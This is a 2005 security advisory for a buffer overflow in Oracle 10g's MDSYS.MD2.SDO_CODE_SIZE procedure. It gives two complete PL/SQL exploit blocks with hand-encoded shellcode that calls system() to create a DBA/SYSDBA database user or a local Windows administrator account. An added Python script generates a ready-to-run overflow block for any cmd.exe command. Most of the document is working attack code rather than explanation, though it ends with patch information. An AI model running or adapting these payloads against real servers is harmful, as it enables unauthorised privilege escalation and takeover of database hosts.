Oracle Exploit Buffer Overflow MDSYS.MD2.SDO_CODE_SIZE
Name
Oracle Buffer Overflow MDSYS.MD2.SDO_CODE_SIZE
Systems Affected
Oracle 10g
Severity
High Risk
Category
Buffer Overflow
Vendor URL
http://www.oracle.com/
Credit
Esteban Martinez Fayo
Exploit
http://www.argeniss.com/research/oraclesqlinj.zip
Date
05 May 2005 (V 1.00)
Details
The procedure MDSYS.MD2.SDO_CODE_SIZE does not bound-check its LAYER parameter. A database user who can execute the procedure can pass an oversized string that overflows a stack buffer, overwrites the saved return address and runs attacker-supplied machine code inside the Oracle server process. Because that process runs under the Oracle service account (by default LocalSystem on Windows), the code can call system() to create a database user with DBA and SYSDBA privileges, or a local Windows administrator account, without knowing any database password.
The payloads below are built for Windows 2000 SP4 with Oracle 10.1.0.2 and work only there: the padding length, the address of the DEC EBX / CALL EBX gadget in userenv.dll and the msvcrt.dll addresses of system() and _endthread() are hard-coded for that build (Windows 2000 loads system DLLs at fixed addresses, so no address leak is needed). On any other build the overwritten return address points elsewhere and the call most likely just crashes the server process, i.e. a denial of service. Control flow: the overwritten return address sends execution to the gadget, which transfers control back into the overflowing string; a short stub there loads the address of the trailing command string, calls system() on it and then calls _endthread() so the server thread exits cleanly instead of crashing.
Example for Windows 2000 SP4 + Oracle 10.1.0.2
-- Create a database user HACKER with DBA and SYSDBA privileges by running a SQL script through sqlplus "/ as sysdba" on the server
DECLARE
a BINARY_INTEGER; -- return value
VC VARCHAR2(32767);
BEGIN
VC := 'AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH'
|| CHR(131) || CHR(195) || CHR(9) || CHR(255) || CHR(227)
/*
83C3 09 ADD EBX,9
FFE3 JMP EBX
*/
|| CHR(251) || CHR(90) || CHR (227) || CHR(120) -- Jump to address 0x78E35AFB
/*
userenv.dll
78E35AFB 4B DEC EBX
78E35AFC FFD3 CALL EBX
*/
|| CHR(54) || CHR(141) || CHR(67) || CHR(19) || CHR(80) || chr(184) || chr(191) || chr(142) || chr(01) || chr(120) || chr(255) || chr(208) || chr(184) || chr(147) || chr(131) || chr(00) || chr(120) || chr(255) || chr(208)
/*
36:8D43 13 LEA EAX,DWORD PTR SS:[EBX+13]
50 PUSH EAX
B8 BF8E0178 MOV EAX,MSVCRT.system
FFD0 CALL EAX
B8 93830078 MOV EAX,MSVCRT._endthread
FFD0 CALL EAX
*/
-- The command string is passed to MSVCRT system(), so it is cmd.exe syntax. It writes c:\cu.sql and runs it with
-- sqlplus "/ as sysdba", relying on OS authentication of the account the Oracle service runs under. '&' is passed
-- as chr(38) so that SQL*Plus does not treat it as a substitution variable when this block is pasted in.
-- Adjust the sqlplus.exe path to the target's ORACLE_HOME (the path below is garbled in the source).
|| 'echo CREATE USER HACKER IDENTIFIED BY HACKER;> c:\cu.sql'||chr(38)||'echo GRANT DBA TO HACKER;>> c:\cu.sql '||chr(38)||' echo ALTER USER HACKER DEFAULT ROLE DBA;>> c:\cu.sql '||chr(38)||' echo GRANT SYSDBA TO "HACKER" WITH ADMIN OPTION;>> c:\cu.sql'||chr(38)||'echo QUIT>> c:\cu.sql '||chr(38)||' c:\oracle10円.1.0\db_1\bin\sqlplus.exe "/ as sysdba" @c:\cu.sql 1> c:\stdout.log 2> c:\stderr.log';
a := MDSYS.MD2.SDO_CODE_SIZE (LAYER => VC);
END;
-- Create a Windows OS user 'hacker' and add it to the local Administrators and ORA_DBA groups (ORA_DBA membership gives "/ as sysdba" access)
DECLARE
a BINARY_INTEGER; -- return value
VC VARCHAR2(32767);
BEGIN
VC := 'AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH'
|| CHR(131) || CHR(195) || CHR(9) || CHR(255) || CHR(227)
/*
83C3 09 ADD EBX,9
FFE3 JMP EBX
*/
|| CHR(251) || CHR(90) || CHR (227) || CHR(120) -- Jump to address 0x78E35AFB
/*
userenv.dll
78E35AFB 4B DEC EBX
78E35AFC FFD3 CALL EBX
*/
|| CHR(54) || CHR(141) || CHR(67) || CHR(19) || CHR(80) || chr(184) || chr(191) || chr(142) || chr(01) || chr(120) || chr(255) || chr(208) || chr(184) || chr(147) || chr(131) || chr(00) || chr(120) || chr(255) || chr(208)
/*
36:8D43 13 LEA EAX,DWORD PTR SS:[EBX+13]
50 PUSH EAX
B8 BF8E0178 MOV EAX,MSVCRT.system
FFD0 CALL EAX
B8 93830078 MOV EAX,MSVCRT._endthread
FFD0 CALL EAX
*/
-- 'Administradores' is the Spanish-localized name of the Administrators group; on an English Windows
-- installation use 'Administrators'. As above, '&' is passed as chr(38) for SQL*Plus.
|| 'net user hacker /add '||chr(38)||' net localgroup Administradores hacker /add '||chr(38)||' net localgroup ORA_DBA hacker /add';
a := MDSYS.MD2.SDO_CODE_SIZE (LAYER => VC);
END;
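The two payloads above differ only in the command string; everything in front of it (the padding, the ADD EBX,9 / JMP EBX stub, the userenv.dll gadget address and the LEA/PUSH/CALL stub) is identical and hand-encoded as CHR() calls. The following Python script is an added example, not code from the advisory or from Argeniss. It rebuilds that layout from raw bytes so that the little-endian address encoding and the LEA EAX,[EBX+disp8] displacement (which must equal the stub length for EAX to point at the command string; the advisory hard-codes 0x13) are computed and checked rather than transcribed, escapes the command for PL/SQL (doubling single quotes, emitting & as CHR(38) so SQL*Plus does not treat it as a substitution variable, rejecting NUL bytes that would truncate the string system() sees), and prints a ready-to-run PL/SQL block. The padding string and all addresses are taken unchanged from the advisory and are only valid for Windows 2000 SP4 with Oracle 10.1.0.2; the function names and the trailing "/" terminator line are my own choices.

```python
"""Rebuild the MDSYS.MD2.SDO_CODE_SIZE overflow payload from raw bytes.

Added example, not code from the advisory or from Argeniss. Padding and
addresses are copied from the advisory (Windows 2000 SP4 + Oracle 10.1.0.2,
no ASLR, fixed DLL load addresses) and mean nothing on any other build.
"""
import struct

# Padding copied verbatim from the advisory. Its length is what reaches the
# saved return address on the affected build; it was found empirically there.
PADDING = "AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH"

# Addresses from the advisory's disassembly comments.
GADGET_DEC_EBX_CALL_EBX = 0x78E35AFB  # userenv.dll: DEC EBX / CALL EBX
MSVCRT_SYSTEM = 0x78018EBF            # msvcrt.dll: system()
MSVCRT_ENDTHREAD = 0x78008393         # msvcrt.dll: _endthread()

# Placed just before the return address: ADD EBX,9 / JMP EBX (83 C3 09 FF E3).
JUMP_STUB = b"\x83\xc3\x09\xff\xe3"


def p32(addr: int) -> bytes:
    """Pack a 32-bit address little-endian, the way the x86 stack stores it."""
    return struct.pack("<I", addr)


def build_stub(system_addr: int, endthread_addr: int) -> bytes:
    """LEA EAX,[EBX+disp] / PUSH EAX / CALL system / CALL _endthread.

    disp is derived from the stub length so EAX always points at the command
    string that directly follows the stub (the advisory hard-codes 0x13).
    """
    tail = (b"\x50"                          # PUSH EAX (pointer to command)
            + b"\xb8" + p32(system_addr)     # MOV EAX, MSVCRT.system
            + b"\xff\xd0"                    # CALL EAX
            + b"\xb8" + p32(endthread_addr)  # MOV EAX, MSVCRT._endthread
            + b"\xff\xd0")                   # CALL EAX (exit thread cleanly)
    disp = 4 + len(tail)                     # 4 = length of the LEA itself
    if disp > 0x7F:
        raise ValueError("stub too long for an 8-bit LEA displacement")
    return b"\x36\x8d\x43" + bytes([disp]) + tail  # SS: LEA EAX,[EBX+disp8]


def to_plsql_chr(data: bytes) -> str:
    """Encode raw bytes as a PL/SQL CHR() concatenation."""
    return " || ".join(f"CHR({b})" for b in data)


def to_plsql_command(command: str) -> str:
    """Quote the cmd.exe command line for PL/SQL.

    Single quotes are doubled; '&' is emitted as CHR(38) so that SQL*Plus does
    not treat it as a substitution variable (the advisory does the same).
    """
    if "\x00" in command:
        raise ValueError("NUL would truncate the string passed to system()")
    parts = command.replace("'", "''").split("&")
    return " || CHR(38) || ".join(f"'{part}'" for part in parts)


def build_payload(command: str) -> str:
    """PL/SQL expression for the LAYER argument: padding, stubs, command."""
    return " || ".join([
        f"'{PADDING}'",
        to_plsql_chr(JUMP_STUB),
        to_plsql_chr(p32(GADGET_DEC_EBX_CALL_EBX)),
        to_plsql_chr(build_stub(MSVCRT_SYSTEM, MSVCRT_ENDTHREAD)),
        to_plsql_command(command),
    ])


def build_block(command: str) -> str:
    """Complete anonymous PL/SQL block that triggers the overflow."""
    return (
        "DECLARE\n"
        "  a  BINARY_INTEGER;  -- return value\n"
        "  VC VARCHAR2(32767);\n"
        "BEGIN\n"
        f"  VC := {build_payload(command)};\n"
        "  a := MDSYS.MD2.SDO_CODE_SIZE(LAYER => VC);\n"
        "END;\n"
        "/\n"
    )


if __name__ == "__main__":
    # OS-user variant from the advisory with the English group name.
    print(build_block("net user hacker /add & net localgroup Administrators "
                      "hacker /add & net localgroup ORA_DBA hacker /add"))
```

Running the script prints the PL/SQL for the OS-user variant; any other cmd.exe command line can be passed to build_block(). The value of writing it this way is that changing a target address or the stub can no longer silently desynchronise the LEA displacement from the position of the command string, which is the one invariant the hand-encoded CHR() version gives no hint about.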
Patch Information
Apply the patch set for Oracle Security Alert 68 or any later patch level.
© 2005 by Red-Database-Security GmbH - last update 02-nov-2005
Definition Exploit
In computer security, an exploit is a piece of software that takes advantage of a bug or vulnerability, leading to privilege escalation or denial of service on a computer system.
Computer security experts use exploit code to test whether a patch is working properly.